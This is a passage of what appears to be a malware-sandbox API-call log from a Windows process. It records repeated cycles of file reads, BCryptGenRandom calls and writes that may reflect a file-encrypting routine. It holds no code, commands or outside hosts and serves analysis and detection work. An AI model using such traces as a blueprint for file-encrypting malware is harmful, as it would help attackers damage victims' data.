nNumberOfBytesToWrite=0x120, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.184] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.192] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x13c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.192] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.192] CloseHandle (hObject=0x2a8) returned 1 [0203.192] free (_Block=0x3df0008) [0203.192] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.198] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.199] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.199] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.199] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.199] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.199] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.199] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.199] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.199] free (_Block=0x3e305b8) [0203.199] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.199] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.200] free (_Block=0x1fa91d0) [0203.200] free (_Block=0x1fa2ed8) [0203.200] free (_Block=0x1fa90b8) [0203.200] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.200] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.200] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.200] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.209] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xf5, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.209] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.209] CloseHandle (hObject=0x2a8) returned 1 [0203.209] free (_Block=0x3df0008) [0203.209] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.215] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.215] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.215] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.215] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.216] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.216] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.216] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.216] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.216] free (_Block=0x3e305b8) [0203.216] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.216] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.216] free (_Block=0x1fa91d0) [0203.216] free (_Block=0x1fa2ed8) [0203.217] free (_Block=0x1fa90b8) [0203.217] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.217] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.217] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.217] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.226] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb7, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.226] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.226] CloseHandle (hObject=0x2a8) returned 1 [0203.226] free (_Block=0x3df0008) [0203.226] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.233] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.233] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.233] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.233] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.234] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.234] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.234] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.234] free (_Block=0x3e305b8) [0203.234] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.234] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.234] free (_Block=0x1fa91d0) [0203.234] free (_Block=0x1fa2ed8) [0203.234] free (_Block=0x1fa90b8) [0203.234] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.235] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.235] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.235] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.244] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10b, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.244] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.244] CloseHandle (hObject=0x2a8) returned 1 [0203.244] free (_Block=0x3df0008) [0203.244] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.250] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.251] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.251] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.251] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.251] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.251] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.251] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.251] free (_Block=0x3e305b8) [0203.251] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.251] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.252] free (_Block=0x1fa91d0) [0203.252] free (_Block=0x1fa2ed8) [0203.252] free (_Block=0x1fa90b8) [0203.252] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.252] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.252] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.253] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.263] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xce, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.263] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.263] CloseHandle (hObject=0x2a8) returned 1 [0203.263] free (_Block=0x3df0008) [0203.263] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.269] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.270] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.270] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.270] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.270] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.270] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.270] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.270] free (_Block=0x3e305b8) [0203.270] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.270] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.271] free (_Block=0x1fa91d0) [0203.271] free (_Block=0x1fa2ed8) [0203.271] free (_Block=0x1fa90b8) [0203.271] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.271] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.271] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.271] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.281] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xaf, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.281] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.281] CloseHandle (hObject=0x2a8) returned 1 [0203.281] free (_Block=0x3df0008) [0203.281] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.287] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.288] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.288] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.288] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.288] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.288] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.288] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.288] free (_Block=0x3e305b8) [0203.288] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.288] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.289] free (_Block=0x1fa91d0) [0203.289] free (_Block=0x1fa2ed8) [0203.289] free (_Block=0x1fa90b8) [0203.289] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x617, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.289] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.289] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.289] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.298] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xad, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.298] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.299] CloseHandle (hObject=0x2a8) returned 1 [0203.299] free (_Block=0x3df0008) [0203.299] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.305] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.305] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.305] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.305] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.306] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.306] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.306] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.306] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.306] free (_Block=0x3e305b8) [0203.306] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.306] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.306] free (_Block=0x1fa91d0) [0203.306] free (_Block=0x1fa2ed8) [0203.306] free (_Block=0x1fa90b8) [0203.306] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x613, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.307] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.307] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xb0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.307] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.315] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xb9, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.315] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.315] CloseHandle (hObject=0x2a8) returned 1 [0203.315] free (_Block=0x3df0008) [0203.315] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.321] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.322] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.322] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 0x0 [0203.322] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.322] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.322] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35ef970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x35ef970) returned 0x0 [0203.322] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0203.322] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0203.322] free (_Block=0x3e305b8) [0203.322] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0203.322] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0203.323] free (_Block=0x1fa91d0) [0203.323] free (_Block=0x1fa2ed8) [0203.323] free (_Block=0x1fa90b8) [0203.323] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.323] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.323] WriteFile (in: hFile=0x2a8, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0xc0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0203.323] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.331] ReadFile (in: hFile=0x2a8, lpBuffer=0x3df003c, nNumberOfBytesToRead=0xad, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0203.331] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.331] CloseHandle (hObject=0x2a8) returned 1 [0203.331] free (_Block=0x3df0008) [0203.331] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x35efc0c, lpCompletionKey=0x35efc1c, lpOverlapped=0x35efc18) returned 1 [0203.338] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0203.338] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0203.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x35efc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x35efc30) returned 